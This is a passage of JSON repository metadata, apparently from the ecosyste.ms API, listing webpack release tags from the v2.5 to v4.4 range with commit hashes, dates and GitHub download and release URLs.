osts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/